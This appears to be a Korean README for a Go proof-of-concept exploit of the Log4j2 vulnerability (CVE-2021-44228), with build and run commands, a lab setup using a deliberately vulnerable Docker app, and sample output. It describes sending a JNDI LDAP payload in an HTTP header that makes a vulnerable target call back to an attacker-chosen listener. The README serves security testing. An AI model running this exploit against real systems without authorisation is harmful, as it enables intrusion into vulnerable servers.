
Go로 작성된 간단한 Log4j PoC
⚠️ 면책 조항:
이 도구는 교육 목적, 보안 연구 및 통제된 테스트 환경에서만 사용하도록 제작되었습니다.
명시적인 허가 없이 시스템에 사용하는 것은 불법이며, 그 책임은 전적으로 사용자에게 있습니다.
이 프로젝트는 Apache Log4j2 (CVE-2021-44228) 취약점에 대한 간단한 개념 증명(PoC) 익스플로잇을 포함합니다.
PoC는 JNDI LDAP 페이로드가 포함된 특수하게 조작된 HTTP 헤더를 대상에 전송합니다.
대상이 취약한 경우, 지정된 LHOST 주소로 콜백을 전송합니다.
go build -o exploit exploit.go
sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
-r → 대상 URL (취약한 애플리케이션의 엔드포인트)-l → 콜백 리스너 IP 주소 (PoC를 실행하는 시스템)제공된 Docker 취약 애플리케이션을 사용한 예시:
# Run vulnerable app
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app
# Run exploit
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1
예상 출력:
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE